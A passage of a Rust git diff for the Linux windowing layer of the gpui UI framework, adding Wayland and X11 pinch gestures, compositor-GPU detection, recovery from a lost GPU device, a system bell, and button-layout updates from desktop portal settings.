state.clipboard.set(item); - let serial = state.serial_tracker.get(SerialKind::KeyPress); + let serial = state + .serial_tracker + .latest_of(&[SerialKind::KeyPress, SerialKind::MousePress]); let data_source = data_device_manager.create_data_source(&state.globals.qh, ()); for mime_type in TEXT_MIME_TYPES { data_source.offer(mime_type.to_string()); @@ -904,6 +951,70 @@ impl LinuxClient for WaylandClient { } } +struct DmabufProbeState { + device: Option, +} + +impl Dispatch for DmabufProbeState { + fn event( + _: &mut Self, + _: &wl_registry::WlRegistry, + _: wl_registry::Event, + _: &GlobalListContents, + _: &Connection, + _: &QueueHandle, + ) { + } +} + +impl Dispatch for DmabufProbeState { + fn event( + _: &mut Self, + _: &zwp_linux_dmabuf_v1::ZwpLinuxDmabufV1, + _: zwp_linux_dmabuf_v1::Event, + _: &(), + _: &Connection, + _: &QueueHandle, + ) { + } +} + +impl Dispatch for DmabufProbeState { + fn event( + state: &mut Self, + _: &zwp_linux_dmabuf_feedback_v1::ZwpLinuxDmabufFeedbackV1, + event: zwp_linux_dmabuf_feedback_v1::Event, + _: &(), + _: &Connection, + _: &QueueHandle, + ) { + if let zwp_linux_dmabuf_feedback_v1::Event::MainDevice { device } = event { + if let Ok(bytes) = <[u8; 8]>::try_from(device.as_slice()) { + state.device = Some(u64::from_ne_bytes(bytes)); + } + } + } +} + +fn detect_compositor_gpu() -> Option { + let connection = Connection::connect_to_env().ok()?; + let (globals, mut event_queue) = registry_queue_init::(&connection).ok()?; + let queue_handle = event_queue.handle(); + + let dmabuf: zwp_linux_dmabuf_v1::ZwpLinuxDmabufV1 = + globals.bind(&queue_handle, 4..=4, ()).ok()?; + let feedback = dmabuf.get_default_feedback(&queue_handle, ()); + + let mut state = DmabufProbeState { device: None }; + + event_queue.roundtrip(&mut state).ok()?; + + feedback.destroy(); + dmabuf.destroy(); + + crate::linux::compositor_gpu_hint_from_dev_t(state.device?) 
+} + impl Dispatch for WaylandClientStatePtr { fn event( this: &mut Self, @@ -948,6 +1059,7 @@ impl Dispatch for WaylandClientStat state .in_progress_outputs .insert(output.id(), InProgressOutput::default()); + state.wl_outputs.insert(output.id(), output); } _ => {} }, @@ -960,6 +1072,7 @@ impl Dispatch for WaylandClientStat } delegate_noop!(WaylandClientStatePtr: ignore xdg_activation_v1::XdgActivationV1); +delegate_noop!(WaylandClientStatePtr: ignore xdg_system_bell_v1::XdgSystemBellV1); delegate_noop!(WaylandClientStatePtr: ignore wl_compositor::WlCompositor); delegate_noop!(WaylandClientStatePtr: ignore wp_cursor_shape_device_v1::WpCursorShapeDeviceV1); delegate_noop!(WaylandClientStatePtr: ignore wp_cursor_shape_manager_v1::WpCursorShapeManagerV1); @@ -1237,6 +1350,12 @@ impl Dispatch for WaylandClientStatePtr { .as_ref() .map(|cursor_shape_manager| cursor_shape_manager.get_pointer(&pointer, qh, ())); + state.pinch_gesture = state.globals.gesture_manager.as_ref().map( + |gesture_manager: &zwp_pointer_gestures_v1::ZwpPointerGesturesV1| { + gesture_manager.get_pinch_gesture(&pointer, qh, ()) + }, + ); + if let Some(wl_pointer) = &state.wl_pointer { wl_pointer.release(); } @@ -1910,6 +2029,91 @@ impl Dispatch for WaylandClientStatePtr { } } +impl Dispatch for WaylandClientStatePtr { + fn event( + _this: &mut Self, + _: &zwp_pointer_gestures_v1::ZwpPointerGesturesV1, + _: ::Event, + _: &(), + _: &Connection, + _: &QueueHandle, + ) { + // The gesture manager doesn't generate events + } +} + +impl Dispatch + for WaylandClientStatePtr +{ + fn event( + this: &mut Self, + _: &zwp_pointer_gesture_pinch_v1::ZwpPointerGesturePinchV1, + event: ::Event, + _: &(), + _: &Connection, + _: &QueueHandle, + ) { + use gpui::PinchEvent; + + let client = this.get_client(); + let mut state = client.borrow_mut(); + + let Some(window) = state.mouse_focused_window.clone() else { + return; + }; + + match event { + zwp_pointer_gesture_pinch_v1::Event::Begin { + serial: _, + time: _, + 
surface: _, + fingers: _, + } => { + state.pinch_scale = 1.0; + let input = PlatformInput::Pinch(PinchEvent { + position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))), + delta: 0.0, + modifiers: state.modifiers, + phase: TouchPhase::Started, + }); + drop(state); + window.handle_input(input); + } + zwp_pointer_gesture_pinch_v1::Event::Update { time: _, scale, .. } => { + let new_absolute_scale = scale as f32; + let previous_scale = state.pinch_scale; + let zoom_delta = new_absolute_scale - previous_scale; + state.pinch_scale = new_absolute_scale; + + let input = PlatformInput::Pinch(PinchEvent { + position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))), + delta: zoom_delta, + modifiers: state.modifiers, + phase: TouchPhase::Moved, + }); + drop(state); + window.handle_input(input); + } + zwp_pointer_gesture_pinch_v1::Event::End { + serial: _, + time: _, + cancelled: _, + } => { + state.pinch_scale = 1.0; + let input = PlatformInput::Pinch(PinchEvent { + position: state.mouse_location.unwrap_or(point(px(0.0), px(0.0))), + delta: 0.0, + modifiers: state.modifiers, + phase: TouchPhase::Ended, + }); + drop(state); + window.handle_input(input); + } + _ => {} + } + } +} + impl Dispatch for WaylandClientStatePtr { fn event( this: &mut Self, diff --git a/crates/gpui_linux/src/linux/wayland/serial.rs b/crates/gpui_linux/src/linux/wayland/serial.rs index eadc7a9ca97c6f3c78f8a5609deb27e891e52949..ed38f14bd130c4fb6db178fe218bae1327355476 100644 --- a/crates/gpui_linux/src/linux/wayland/serial.rs +++ b/crates/gpui_linux/src/linux/wayland/serial.rs @@ -46,4 +46,16 @@ impl SerialTracker { .map(|serial_data| serial_data.serial) .unwrap_or(0) } + + /// Returns the latest tracked serial of the provided [`SerialKind`]s + /// + /// Will return 0 if not tracked. 
+ pub fn latest_of(&self, kinds: &[SerialKind]) -> u32 { + kinds + .iter() + .filter_map(|kind| self.serials.get(kind)) + .max_by_key(|serial_data| serial_data.serial) + .map(|serial_data| serial_data.serial) + .unwrap_or(0) + } } diff --git a/crates/gpui_linux/src/linux/wayland/window.rs b/crates/gpui_linux/src/linux/wayland/window.rs index 4a4c4060bdc31b95bd4b90d930afdc54727a9667..1e3af66c59858c435ca3da093a1c48056b77667e 100644 --- a/crates/gpui_linux/src/linux/wayland/window.rs +++ b/crates/gpui_linux/src/linux/wayland/window.rs @@ -12,7 +12,10 @@ use futures::channel::oneshot::Receiver; use raw_window_handle as rwh; use wayland_backend::client::ObjectId; use wayland_client::WEnum; -use wayland_client::{Proxy, protocol::wl_surface}; +use wayland_client::{ + Proxy, + protocol::{wl_output, wl_surface}, +}; use wayland_protocols::wp::viewporter::client::wp_viewport; use wayland_protocols::xdg::decoration::zv1::client::zxdg_toplevel_decoration_v1; use wayland_protocols::xdg::shell::client::xdg_surface; @@ -34,7 +37,7 @@ use gpui::{ WindowDecorations, WindowKind, WindowParams, layer_shell::LayerShellNotSupportedError, px, size, }; -use gpui_wgpu::{WgpuContext, WgpuRenderer, WgpuSurfaceConfig}; +use gpui_wgpu::{CompositorGpuHint, WgpuRenderer, WgpuSurfaceConfig}; #[derive(Default)] pub(crate) struct Callbacks { @@ -47,8 +50,10 @@ pub(crate) struct Callbacks { should_close: Option bool>>, close: Option>, appearance_changed: Option>, + button_layout_changed: Option>, } +#[derive(Debug, Clone, Copy)] struct RawWindow { window: *mut c_void, display: *mut c_void, @@ -111,6 +116,7 @@ pub struct WaylandWindowState { handle: AnyWindowHandle, active: bool, hovered: bool, + pub(crate) force_render_after_recovery: bool, in_progress_configure: Option, resize_throttle: bool, in_progress_window_controls: Option, @@ -129,6 +135,7 @@ impl WaylandSurfaceState { globals: &Globals, params: &WindowParams, parent: Option, + target_output: Option, ) -> anyhow::Result { // For layer_shell 
windows, create a layer surface instead of an xdg surface if let WindowKind::LayerShell(options) = ¶ms.kind { @@ -138,7 +145,7 @@ impl WaylandSurfaceState { let layer_surface = layer_shell.get_layer_surface( &surface, - None, + target_output.as_ref(), super::layer_shell::wayland_layer(options.layer), options.namespace.clone(), &globals.qh, @@ -317,7 +324,8 @@ impl WaylandWindowState { viewport: Option, client: WaylandClientStatePtr, globals: Globals, - gpu_context: &mut Option, + gpu_context: gpui_wgpu::GpuContext, + compositor_gpu: Option, options: WindowParams, parent: Option, ) -> anyhow::Result { @@ -337,14 +345,21 @@ impl WaylandWindowState { height: DevicePixels(f32::from(options.bounds.size.height) as i32), }, transparent: true, + preferred_present_mode: None, }; - WgpuRenderer::new(gpu_context, &raw_window, config)? + WgpuRenderer::new(gpu_context, &raw_window, config, compositor_gpu)? }; if let WaylandSurfaceState::Xdg(ref xdg_state) = surface_state { if let Some(title) = options.titlebar.and_then(|titlebar| titlebar.title) { xdg_state.toplevel.set_title(title.to_string()); } + // Set max window size based on the GPU's maximum texture dimension. + // This prevents the window from being resized larger than what the GPU can render. 
+ let max_texture_size = renderer.max_texture_size() as i32; + xdg_state + .toplevel + .set_max_size(max_texture_size, max_texture_size); } Ok(Self { @@ -376,6 +391,7 @@ impl WaylandWindowState { handle, active: false, hovered: false, + force_render_after_recovery: false, in_progress_window_controls: None, window_controls: WindowControls::default(), client_inset: None, @@ -481,14 +497,17 @@ impl WaylandWindow { pub fn new( handle: AnyWindowHandle, globals: Globals, - gpu_context: &mut Option, + gpu_context: gpui_wgpu::GpuContext, + compositor_gpu: Option, client: WaylandClientStatePtr, params: WindowParams, appearance: WindowAppearance, parent: Option, + target_output: Option, ) -> anyhow::Result<(Self, ObjectId)> { let surface = globals.compositor.create_surface(&globals.qh, ()); - let surface_state = WaylandSurfaceState::new(&surface, &globals, ¶ms, parent.clone())?; + let surface_state = + WaylandSurfaceState::new(&surface, &globals, ¶ms, parent.clone(), target_output)?; if let Some(fractional_scale_manager) = globals.fractional_scale_manager.as_ref() { fractional_scale_manager.get_fractional_scale(&surface, &globals.qh, surface.id()); @@ -509,6 +528,7 @@ impl WaylandWindow { client, globals, gpu_context, + compositor_gpu, params, parent, )?)), @@ -553,11 +573,16 @@ impl WaylandWindowStatePtr { let mut state = self.state.borrow_mut(); state.surface.frame(&state.globals.qh, state.surface.id()); state.resize_throttle = false; + let force_render = state.force_render_after_recovery; + state.force_render_after_recovery = false; drop(state); let mut cb = self.callbacks.borrow_mut(); if let Some(fun) = cb.request_frame.as_mut() { - fun(Default::default()); + fun(RequestFrameOptions { + force_render, + ..Default::default() + }); } } @@ -585,6 +610,7 @@ impl WaylandWindowStatePtr { state.tiling = configure.tiling; // Limit interactive resizes to once per vblank if configure.resizing && state.resize_throttle { + state.surface_state.ack_configure(serial); return; } else if 
configure.resizing { state.resize_throttle = true; @@ -1021,6 +1047,14 @@ impl WaylandWindowStatePtr { } } + pub fn set_button_layout(&self) { + let callback = self.callbacks.borrow_mut().button_layout_changed.take(); + if let Some(mut fun) = callback { + fun(); + self.callbacks.borrow_mut().button_layout_changed = Some(fun); + } + } + pub fn primary_output_scale(&self) -> i32 { self.state.borrow_mut().primary_output_scale() } @@ -1242,6 +1276,7 @@ impl PlatformWindow for WaylandWindow { let state = client.borrow(); state .gpu_context + .borrow() .as_ref() .is_some_and(|ctx| ctx.supports_dual_source_blending()) } @@ -1317,8 +1352,38 @@ impl PlatformWindow for WaylandWindow { self.0.callbacks.borrow_mut().appearance_changed = Some(callback); } + fn on_button_layout_changed(&self, callback: Box) { + self.0.callbacks.borrow_mut().button_layout_changed = Some(callback); + } + fn draw(&self, scene: &Scene) { let mut state = self.borrow_mut(); + + if state.renderer.device_lost() { + let raw_window = RawWindow { + window: state.surface.id().as_ptr().cast::(), + display: state + .surface + .backend() + .upgrade() + .unwrap() + .display_ptr() + .cast::(), + }; + state.renderer.recover(&raw_window).unwrap_or_else(|err| { + panic!( + "GPU device lost and recovery failed. \ + This may happen after system suspend/resume. \ + Please restart the application.\n\nError: {err}" + ) + }); + + // The current scene references atlas textures that were cleared during recovery. + // Skip this frame and let the next frame rebuild the scene with fresh textures. 
+ state.force_render_after_recovery = true; + return; + } + state.renderer.draw(scene); } @@ -1414,6 +1479,18 @@ impl PlatformWindow for WaylandWindow { fn gpu_specs(&self) -> Option { self.borrow().renderer.gpu_specs().into() } + + fn play_system_bell(&self) { + let state = self.borrow(); + let surface = if state.surface_state.toplevel().is_some() { + Some(&state.surface) + } else { + None + }; + if let Some(bell) = state.globals.system_bell.as_ref() { + bell.ring(surface); + } + } } fn update_window(mut state: RefMut) { diff --git a/crates/gpui_linux/src/linux/x11/client.rs b/crates/gpui_linux/src/linux/x11/client.rs index 7e3f67c9bf5fe3176f3badd9b33375ffdeb9dc19..57871e6ef32b937a7a47662f8022293a57bc3fe2 100644 --- a/crates/gpui_linux/src/linux/x11/client.rs +++ b/crates/gpui_linux/src/linux/x11/client.rs @@ -31,7 +31,7 @@ use x11rb::{ AtomEnum, ChangeWindowAttributesAux, ClientMessageData, ClientMessageEvent, ConnectionExt as _, EventMask, ModMask, Visibility, }, - protocol::{Event, randr, render, xinput, xkb, xproto}, + protocol::{Event, dri3, randr, render, xinput, xkb, xproto}, resource_manager::Database, wrapper::ConnectionExt as _, xcb_ffi::XCBConnection, @@ -62,9 +62,9 @@ use gpui::{ AnyWindowHandle, Bounds, ClipboardItem, CursorStyle, DisplayId, FileDropEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, Pixels, PlatformDisplay, PlatformInput, PlatformKeyboardLayout, PlatformWindow, Point, RequestFrameOptions, ScrollDelta, Size, - TouchPhase, WindowParams, point, px, + TouchPhase, WindowButtonLayout, WindowParams, point, px, }; -use gpui_wgpu::WgpuContext; +use gpui_wgpu::{CompositorGpuHint, GpuContext}; /// Value for DeviceId parameters which selects all devices. 
pub(crate) const XINPUT_ALL_DEVICES: xinput::DeviceId = 0; @@ -176,8 +176,10 @@ pub struct X11ClientState { pub(crate) last_mouse_button: Option, pub(crate) last_location: Point, pub(crate) current_count: usize, + pub(crate) pinch_scale: f32, - pub(crate) gpu_context: Option, + pub(crate) gpu_context: GpuContext, + pub(crate) compositor_gpu: Option, pub(crate) scale_factor: f32, @@ -294,7 +296,7 @@ impl X11ClientStatePtr { } #[derive(Clone)] -pub(crate) struct X11Client(Rc>); +pub(crate) struct X11Client(pub(crate) Rc>); impl X11Client { pub(crate) fn new() -> anyhow::Result { @@ -341,11 +343,12 @@ impl X11Client { xcb_connection.prefetch_extension_information(render::X11_EXTENSION_NAME)?; xcb_connection.prefetch_extension_information(xinput::X11_EXTENSION_NAME)?; - // Announce to X server that XInput up to 2.1 is supported. To increase this to 2.2 and - // beyond, support for touch events would need to be added. + // Announce to X server that XInput up to 2.4 is supported. + // Version 2.4 is needed for gesture events (GesturePinchBegin/Update/End). + // If the server only supports an older version, gesture events simply won't be delivered. 
let xinput_version = get_reply( || "XInput XiQueryVersion failed", - xcb_connection.xinput_xi_query_version(2, 1), + xcb_connection.xinput_xi_query_version(2, 4), )?; assert!( xinput_version.major_version >= 2, @@ -430,6 +433,9 @@ impl X11Client { let clipboard = Clipboard::new().context("Failed to initialize clipboard")?; + let screen = &xcb_connection.setup().roots[x_root_index]; + let compositor_gpu = detect_compositor_gpu(&xcb_connection, screen); + let xcb_connection = Rc::new(xcb_connection); let ximc = X11rbClient::init(Rc::clone(&xcb_connection), x_root_index, None).ok(); @@ -468,6 +474,15 @@ impl X11Client { window.window.set_appearance(appearance); } } + XDPEvent::ButtonLayout(layout_str) => { + let layout = WindowButtonLayout::parse(&layout_str) + .log_err() + .unwrap_or_else(WindowButtonLayout::linux_default); + client.with_common(|common| common.button_layout = layout); + for window in client.0.borrow_mut().windows.values_mut() { + window.window.set_button_layout(); + } + } XDPEvent::CursorTheme(_) | XDPEvent::CursorSize(_) => { // noop, X11 manages this for us. 
} @@ -489,7 +504,9 @@ impl X11Client { last_mouse_button: None, last_location: Point::new(px(0.0), px(0.0)), current_count: 0, - gpu_context: None, + pinch_scale: 1.0, + gpu_context: Rc::new(RefCell::new(None)), + compositor_gpu, scale_factor, xkb_context, @@ -597,6 +614,9 @@ impl X11Client { Ok(None) => { break; } + Err(err @ ConnectionError::IoError(..)) => { + return Err(EventHandlerError::from(err)); + } Err(err) => { let err = handle_connection_error(err); log::warn!("error while polling for X11 events: {err:?}"); @@ -1307,6 +1327,64 @@ impl X11Client { reset_pointer_device_scroll_positions(pointer); } } + Event::XinputGesturePinchBegin(event) => { + let window = self.get_window(event.event)?; + let mut state = self.0.borrow_mut(); + state.pinch_scale = 1.0; + let modifiers = modifiers_from_xinput_info(event.mods); + state.modifiers = modifiers; + let position = point( + px(event.event_x as f32 / u16::MAX as f32 / state.scale_factor), + px(event.event_y as f32 / u16::MAX as f32 / state.scale_factor), + ); + drop(state); + window.handle_input(PlatformInput::Pinch(gpui::PinchEvent { + position, + delta: 0.0, + modifiers, + phase: gpui::TouchPhase::Started, + })); + } + Event::XinputGesturePinchUpdate(event) => { + let window = self.get_window(event.event)?; + let mut state = self.0.borrow_mut(); + let modifiers = modifiers_from_xinput_info(event.mods); + state.modifiers = modifiers; + let position = point( + px(event.event_x as f32 / u16::MAX as f32 / state.scale_factor), + px(event.event_y as f32 / u16::MAX as f32 / state.scale_factor), + ); + // scale is in FP16.16 format: divide by 65536 to get the float value + let new_absolute_scale = event.scale as f32 / 65536.0; + let previous_scale = state.pinch_scale; + let zoom_delta = new_absolute_scale - previous_scale; + state.pinch_scale = new_absolute_scale; + drop(state); + window.handle_input(PlatformInput::Pinch(gpui::PinchEvent { + position, + delta: zoom_delta, + modifiers, + phase: gpui::TouchPhase::Moved, + 
})); + } + Event::XinputGesturePinchEnd(event) => { + let window = self.get_window(event.event)?; + let mut state = self.0.borrow_mut(); + state.pinch_scale = 1.0; + let modifiers = modifiers_from_xinput_info(event.mods); + state.modifiers = modifiers; + let position = point( + px(event.event_x as f32 / u16::MAX as f32 / state.scale_factor), + px(event.event_y as f32 / u16::MAX as f32 / state.scale_factor), + ); + drop(state); + window.handle_input(PlatformInput::Pinch(gpui::PinchEvent { + position, + delta: 0.0, + modifiers, + phase: gpui::TouchPhase::Ended, + })); + } _ => {} }; @@ -1514,11 +1592,13 @@ impl LinuxClient for X11Client { let atoms = state.atoms; let scale_factor = state.scale_factor; let appearance = state.common.appearance; + let compositor_gpu = state.compositor_gpu.take(); let window = X11Window::new( handle, X11ClientStatePtr(Rc::downgrade(&self.0)), state.common.foreground_executor.clone(), - &mut state.gpu_context, + state.gpu_context.clone(), + compositor_gpu, params, &xcb_connection, client_side_decorations_supported, @@ -1864,11 +1944,14 @@ impl X11ClientState { if let Some(window) = state.windows.get_mut(&x_window) { let expose_event_received = window.expose_event_received; window.expose_event_received = false; + let force_render = std::mem::take( + &mut window.window.state.borrow_mut().force_render_after_recovery, + ); let window = window.window.clone(); drop(state); window.refresh(RequestFrameOptions { require_presentation: expose_event_received, - force_render: false, + force_render, }); } xcb_connection @@ -1976,7 +2059,30 @@ fn fp3232_to_f32(value: xinput::Fp3232) -> f32 { value.integral as f32 + value.frac as f32 / u32::MAX as f32 } -fn check_compositor_present(xcb_connection: &XCBConnection, root: u32) -> bool { +fn detect_compositor_gpu( + xcb_connection: &XCBConnection, + screen: &xproto::Screen, +) -> Option { + use std::os::fd::AsRawFd; + use std::os::unix::fs::MetadataExt; + + xcb_connection + 
.extension_information(dri3::X11_EXTENSION_NAME) + .ok()??; + + let reply = dri3::open(xcb_connection, screen.root, 0) + .ok()? + .reply() + .ok()?; + let fd = reply.device_fd; + + let path = format!("/proc/self/fd/{}", fd.as_raw_fd()); + let metadata = std::fs::metadata(&path).ok()?; + + crate::linux::compositor_gpu_hint_from_dev_t(metadata.rdev()) +} + +fn check_compositor_present(xcb_connection: &XCBConnection, root: xproto::Window) -> bool { // Method 1: Check for _NET_WM_CM_S{root} let atom_name = format!("_NET_WM_CM_S{}", root); let atom1 = get_reply( diff --git a/crates/gpui_linux/src/linux/x11/window.rs b/crates/gpui_linux/src/linux/x11/window.rs index 0ddd6e7adff84908e6a1c06d661347d39bdc5c9e..1974cc0bb28f62da4d7dcb3e9fca92b6324470bb 100644 --- a/crates/gpui_linux/src/linux/x11/window.rs +++ b/crates/gpui_linux/src/linux/x11/window.rs @@ -9,7 +9,7 @@ use gpui::{ Tiling, WindowAppearance, WindowBackgroundAppearance, WindowBounds, WindowControlArea, WindowDecorations, WindowKind, WindowParams, px, }; -use gpui_wgpu::{WgpuContext, WgpuRenderer, WgpuSurfaceConfig}; +use gpui_wgpu::{CompositorGpuHint, WgpuRenderer, WgpuSurfaceConfig}; use collections::FxHashSet; use raw_window_handle as rwh; @@ -225,6 +225,7 @@ fn find_visuals(xcb: &XCBConnection, screen_index: usize) -> VisualSet { set } +#[derive(Debug, Clone, Copy)] struct RawWindow { connection: *mut c_void, screen_id: usize, @@ -249,6 +250,7 @@ pub struct Callbacks { should_close: Option bool>>, close: Option>, appearance_changed: Option>, + button_layout_changed: Option>, } pub struct X11WindowState { @@ -259,6 +261,8 @@ pub struct X11WindowState { executor: ForegroundExecutor, atoms: XcbAtoms, x_root_window: xproto::Window, + x_screen_index: usize, + visual_id: u32, pub(crate) counter_id: sync::Counter, pub(crate) last_sync_counter: Option, bounds: Bounds, @@ -273,6 +277,7 @@ pub struct X11WindowState { hidden: bool, active: bool, hovered: bool, + pub(crate) force_render_after_recovery: bool, fullscreen: 
bool, client_side_decorations_supported: bool, decorations: WindowDecorations, @@ -319,12 +324,28 @@ impl rwh::HasDisplayHandle for RawWindow { impl rwh::HasWindowHandle for X11Window { fn window_handle(&self) -> Result, rwh::HandleError> { - unimplemented!() + let Some(non_zero) = NonZeroU32::new(self.0.x_window) else { + return Err(rwh::HandleError::Unavailable); + }; + let handle = rwh::XcbWindowHandle::new(non_zero); + Ok(unsafe { rwh::WindowHandle::borrow_raw(handle.into()) }) } } + impl rwh::HasDisplayHandle for X11Window { fn display_handle(&self) -> Result, rwh::HandleError> { - unimplemented!() + let connection = + as_raw_xcb_connection::AsRawXcbConnection::as_raw_xcb_connection(&*self.0.xcb) + as *mut _; + let Some(non_zero) = NonNull::new(connection) else { + return Err(rwh::HandleError::Unavailable); + }; + let screen_id = { + let state = self.0.state.borrow(); + u32::from(state.display.id()) as i32 + }; + let handle = rwh::XcbDisplayHandle::new(Some(non_zero), screen_id); + Ok(unsafe { rwh::DisplayHandle::borrow_raw(handle.into()) }) } } @@ -391,7 +412,8 @@ impl X11WindowState { handle: AnyWindowHandle, client: X11ClientStatePtr, executor: ForegroundExecutor, - gpu_context: &mut Option, + gpu_context: gpui_wgpu::GpuContext, + compositor_gpu: Option, params: WindowParams, xcb: &Rc, client_side_decorations_supported: bool, @@ -497,21 +519,6 @@ impl X11WindowState { ), )?; - if let Some(size) = params.window_min_size { - let mut size_hints = WmSizeHints::new(); - let min_size = (f32::from(size.width) as i32, f32::from(size.height) as i32); - size_hints.min_size = Some(min_size); - check_reply( - || { - format!( - "X11 change of WM_SIZE_HINTS failed. 
min_size: {:?}", - min_size - ) - }, - size_hints.set_normal_hints(xcb, x_window), - )?; - } - let reply = get_reply(|| "X11 GetGeometry failed.", xcb.get_geometry(x_window))?; if reply.x == 0 && reply.y == 0 { bounds.origin.x.0 += 2; @@ -529,7 +536,7 @@ impl X11WindowState { && let Some(title) = titlebar.title { check_reply( - || "X11 ChangeProperty8 on window title failed.", + || "X11 ChangeProperty8 on WM_NAME failed.", xcb.change_property8( xproto::PropMode::REPLACE, x_window, @@ -538,6 +545,16 @@ impl X11WindowState { title.as_bytes(), ), )?; + check_reply( + || "X11 ChangeProperty8 on _NET_WM_NAME failed.", + xcb.change_property8( + xproto::PropMode::REPLACE, + x_window, + atoms._NET_WM_NAME, + atoms.UTF8_STRING, + title.as_bytes(), + ), + )?; } if params.kind == WindowKind::PopUp { @@ -654,7 +671,13 @@ impl X11WindowState { | xinput::XIEventMask::BUTTON_PRESS | xinput::XIEventMask::BUTTON_RELEASE | xinput::XIEventMask::ENTER - | xinput::XIEventMask::LEAVE, + | xinput::XIEventMask::LEAVE + // x11rb 0.13 doesn't define XIEventMask constants for gesture + // events, so we construct them from the event opcodes (each + // XInput event type N maps to mask bit N). + | xinput::XIEventMask::from(1u32 << xinput::GESTURE_PINCH_BEGIN_EVENT) + | xinput::XIEventMask::from(1u32 << xinput::GESTURE_PINCH_UPDATE_EVENT) + | xinput::XIEventMask::from(1u32 << xinput::GESTURE_PINCH_END_EVENT), ], }], ), @@ -693,10 +716,30 @@ impl X11WindowState { // If the window appearance changes, then the renderer will get updated // too transparent: false, + preferred_present_mode: None, }; - WgpuRenderer::new(gpu_context, &raw_window, config)? + WgpuRenderer::new(gpu_context, &raw_window, config, compositor_gpu)? }; + // Set max window size hints based on the GPU's maximum texture dimension. + // This prevents the window from being resized larger than what the GPU can render. 
+ let max_texture_size = renderer.max_texture_size(); + let mut size_hints = WmSizeHints::new(); + if let Some(size) = params.window_min_size { + size_hints.min_size = + Some((f32::from(size.width) as i32, f32::from(size.height) as i32)); + } + size_hints.max_size = Some((max_texture_size as i32, max_texture_size as i32)); + check_reply( + || { + format!( + "X11 change of WM_SIZE_HINTS failed. max_size: {:?}", + max_texture_size + ) + }, + size_hints.set_normal_hints(xcb, x_window), + )?; + let display = Rc::new(X11Display::new(xcb, scale_factor, x_screen_index)?); Ok(Self { @@ -706,6 +749,8 @@ impl X11WindowState { executor, display, x_root_window: visual_set.root, + x_screen_index, + visual_id: visual.id, bounds: bounds.to_pixels(scale_factor), scale_factor, renderer, @@ -713,6 +758,7 @@ impl X11WindowState { input_handler: None, active: false, hovered: false, + force_render_after_recovery: false, fullscreen: false, maximized_vertical: false, maximized_horizontal: false, @@ -798,7 +844,8 @@ impl X11Window { handle: AnyWindowHandle, client: X11ClientStatePtr, executor: ForegroundExecutor, - gpu_context: &mut Option, + gpu_context: gpui_wgpu::GpuContext, + compositor_gpu: Option, params: WindowParams, xcb: &Rc, client_side_decorations_supported: bool, @@ -815,6 +862,7 @@ impl X11Window { client, executor, gpu_context, + compositor_gpu, params, xcb, client_side_decorations_supported, @@ -1150,13 +1198,11 @@ impl X11WindowStatePtr { } pub fn set_bounds(&self, bounds: Bounds) -> anyhow::Result<()> { - let mut resize_args = None; - let is_resize; - { + let (is_resize, content_size, scale_factor) = { let mut state = self.state.borrow_mut(); let bounds = bounds.map(|f| px(f as f32 / state.scale_factor)); - is_resize = bounds.size.width != state.bounds.size.width + let is_resize = bounds.size.width != state.bounds.size.width || bounds.size.height != state.bounds.size.height; // If it's a resize event (only width/height changed), we ignore `bounds.origin` @@ -1168,22 
+1214,19 @@ impl X11WindowStatePtr { } let gpu_size = query_render_extent(&self.xcb, self.x_window)?; - if true { - state.renderer.update_drawable_size(gpu_size); - resize_args = Some((state.content_size(), state.scale_factor)); - } + state.renderer.update_drawable_size(gpu_size); + let result = (is_resize, state.content_size(), state.scale_factor); if let Some(value) = state.last_sync_counter.take() { check_reply( || "X11 sync SetCounter failed.", sync::set_counter(&self.xcb, state.counter_id, value), )?; } - } + result + }; let mut callbacks = self.callbacks.borrow_mut(); - if let Some((content_size, scale_factor)) = resize_args - && let Some(ref mut fun) = callbacks.resize - { + if let Some(ref mut fun) = callbacks.resize { fun(content_size, scale_factor) } @@ -1223,6 +1266,14 @@ impl X11WindowStatePtr { self.callbacks.borrow_mut().appearance_changed = Some(fun); } } + + pub fn set_button_layout(&self) { + let callback = self.callbacks.borrow_mut().button_layout_changed.take(); + if let Some(mut fun) = callback { + fun(); + self.callbacks.borrow_mut().button_layout_changed = Some(fun); + } + } } impl PlatformWindow for X11Window { @@ -1476,6 +1527,7 @@ impl PlatformWindow for X11Window { let state = ref_cell.borrow(); state .gpu_context + .borrow() .as_ref() .is_some_and(|ctx| ctx.supports_dual_source_blending()) }) @@ -1568,8 +1620,36 @@ impl PlatformWindow for X11Window { self.0.callbacks.borrow_mut().appearance_changed = Some(callback); } + fn on_button_layout_changed(&self, callback: Box) { + self.0.callbacks.borrow_mut().button_layout_changed = Some(callback); + } + fn draw(&self, scene: &Scene) { let mut inner = self.0.state.borrow_mut(); + + if inner.renderer.device_lost() { + let raw_window = RawWindow { + connection: as_raw_xcb_connection::AsRawXcbConnection::as_raw_xcb_connection( + &*self.0.xcb, + ) as *mut _, + screen_id: inner.x_screen_index, + window_id: self.0.x_window, + visual_id: inner.visual_id, + }; + 
inner.renderer.recover(&raw_window).unwrap_or_else(|err| { + panic!( + "GPU device lost and recovery failed. \ + This may happen after system suspend/resume. \ + Please restart the application.\n\nError: {err}" + ) + }); + + // The current scene references atlas textures that were cleared during recovery. + // Skip this frame and let the next frame rebuild the scene with fresh textures. + inner.force_render_after_recovery = true; + return; + } + inner.renderer.draw(scene); } @@ -1766,4 +1846,9 @@ impl PlatformWindow for X11Window { fn gpu_specs(&self) -> Option { self.0.state.borrow().renderer.gpu_specs().into() } + + fn play_system_bell(&self) { + // Volume 0% means don't increase or decrease from system volume + let _ = self.0.xcb.bell(0); + } } diff --git a/crates/gpui_linux/src/linux/xdg_desktop_portal.rs b/crates/gpui_linux/src/linux/xdg_desktop_portal.rs index 911ac319db2b2a803a5e5e715f7a04f8cb128d7a..9b5d72476b61e81ce1d90d79de9286539060c0ba 100644 --- a/crates/gpui_linux/src/linux/xdg_desktop_portal.rs +++ b/crates/gpui_linux/src/linux/xdg_desktop_portal.rs @@ -15,6 +15,7 @@ pub enum Event { CursorTheme(String), #[cfg_attr(feature = "x11", allow(dead_code))] CursorSize(u32), + ButtonLayout(String), } pub struct XDPEventSource { @@ -51,6 +52,13 @@ impl XDPEventSource { sender.send(Event::CursorSize(initial_size as u32))?; } + if let Ok(initial_layout) = settings + .read::("org.gnome.desktop.wm.preferences", "button-layout") + .await + { + sender.send(Event::ButtonLayout(initial_layout))?; + } + if let Ok(mut cursor_theme_changed) = settings .receive_setting_changed_with_args( "org.gnome.desktop.interface", @@ -89,6 +97,25 @@ impl XDPEventSource { .detach(); } + if let Ok(mut 